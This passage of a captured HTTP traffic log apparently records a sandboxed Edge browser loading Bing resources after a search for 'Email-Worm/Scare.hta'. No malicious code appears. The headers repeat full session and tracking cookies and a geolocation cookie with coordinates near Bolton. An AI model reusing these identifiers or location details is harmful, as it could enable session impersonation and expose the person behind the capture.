cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704

Response

HTTP/2.0 200

x-msedge-ref: Ref A: CDD2F6AFDF0D4136B0D22EC557F2BCE8 Ref B: LON04EDGE1216 Ref C: 2025-03-12T02:37:04Z
date: Wed, 12 Mar 2025 02:37:04 GMT
content-length: 873
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df793
GET

https://www.bing.com/sa/54406577/Blue/HamburgerServicesHeaderFlyout_c.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /sa/54406577/Blue/HamburgerServicesHeaderFlyout_c.js HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704

Response

HTTP/2.0 200

content-length: 1747
content-type: application/x-javascript
cache-control: public, max-age=15552000
content-encoding: br
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
vary: Accept-Encoding
x-eventid: 67d09e6c93f043a0b3974eeb2477f766
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-yFUsZcN+i5SIQmU06jx1KVMDgq8VrQfR1rp1S72fOWE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df97b
GET

https://www.bing.com/hamburger/scfo?ver=54406577&q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531&IID=SERP.5068&IG=C6B6495D728647ADA3098FCFDAE1CBA9&fbnb=1&ru=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3DEmail-Worm%252FScare.hta%26aqs%3Dedge..69i57j69i58.240747624j0j0%26FORM%3DANAB01%26PC%3DU531

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /hamburger/scfo?ver=54406577&q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531&IID=SERP.5068&IG=C6B6495D728647ADA3098FCFDAE1CBA9&fbnb=1&ru=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3DEmail-Worm%252FScare.hta%26aqs%3Dedge..69i57j69i58.240747624j0j0%26FORM%3DANAB01%26PC%3DU531 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704

Response

HTTP/2.0 200

cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
content-length: 13347
content-type: text/html; charset=utf-8
content-encoding: br
expires: -1
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67d0f35162ad425e9b9dd1e1d50a1b32
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-M33pi/Na3eOdeohK36M9LIvItQ8Z6Sel/5EEZ+GkY/E='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: F4A88759CE244B1C9B812D3EC68C4A15 Ref B: LON04EDGE0817 Ref C: 2025-03-12T02:37:05Z
date: Wed, 12 Mar 2025 02:37:05 GMT
set-cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E; expires=Mon, 06-Apr-2026 02:37:05 GMT; path=/; HttpOnly
set-cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32df9c9
GET

https://www.bing.com/rp/MnHJON9xUYXpg-poLvycfocMWOA.svg

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/MnHJON9xUYXpg-poLvycfocMWOA.svg HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

expires: Sat, 15 Mar 2025 10:51:37 GMT
last-modified: Tue, 24 Sep 2024 06:15:49 GMT
etag: 0x8DCDC60559A3D8B
cache-control: public, no-transform, max-age=431956
akamai-grn: 0.53ba1302.1738150667.2d5047a6
timing-allow-origin: *
akamai-amd-bc-debug: [a=92.122.211.103,b=2038577015,c=c,d=1729845890,h=304,k=1,l=6,n=GB_EN_LONDON,o=20940,r=7,j=[[a=10.122.211.117,b=2038577015,c=p,d=1729845890,h=304,k=1,l=4,m=0,r=5]]]
content-length: 1829
content-type: image/svg+xml
content-md5: sAZWXV7m7XOEndvGVe3qMg==
x-ms-request-id: b77445f0-501e-0064-3dee-145a30000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfa2b
GET

https://www.bing.com/rp/9roWR2D5ePtJMzD9tbaESvO2JXw.png

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/9roWR2D5ePtJMzD9tbaESvO2JXw.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

expires: Tue, 11 Mar 2025 01:20:21 GMT
last-modified: Tue, 24 Sep 2024 05:55:36 GMT
etag: 0x8DCDC5D82C8D71F
cache-control: public, no-transform, max-age=212277
akamai-grn: 0.34221002.1738593039.1930bc67
x-ms-request-id: 92d1ed86-a01e-0035-6dbf-5b44c5000000
x-ms-version: 2009-09-19
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2652
content-type: image/png
content-md5: WrkWJlk87o95pyRlU1T3Cg==
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
timing-allow-origin: *
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfa2f
GET

https://www.bing.com/rp/R8ErSC7kK_3o4eRM-pP2JlReVkE.png

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/R8ErSC7kK_3o4eRM-pP2JlReVkE.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

expires: Wed, 12 Mar 2025 02:24:25 GMT
last-modified: Mon, 14 Oct 2024 19:32:12 GMT
etag: 0x8DCEC86E7491049
cache-control: public, no-transform, max-age=6719
akamai-grn: 0.a5421202.1737508647.be4407
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2144
content-type: image/png
